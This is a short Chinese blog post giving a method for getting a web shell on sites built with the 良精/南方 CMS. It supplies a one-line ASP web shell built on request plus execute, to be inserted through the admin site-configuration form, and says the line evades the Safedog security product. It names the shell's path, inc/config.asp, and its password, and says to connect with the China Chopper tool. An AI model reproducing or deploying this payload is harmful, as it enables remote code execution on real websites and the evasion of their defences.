良精南方数据后台插一句话拿shell方法

良精后台网站配置插入过安全狗的一句话:”%><%Y=request(“hacker”)%> <%execute(Y)%><%’

这一句话木马是过安全狗的有没有安全狗都能用,但在你不知道网站有没有安全狗的情况下最好就用这个,不然插入普通一句话后config.asp文件就被狗杀掉了,然后网站就挂了。

一句话木马位置:www.xxx.com/inc/config.asp,密码hacker,用中国菜刀连接即可。

原创文章转载请注明:转载自 七行者博客

本文固定链接: http://www.qxzxp.com/3293.html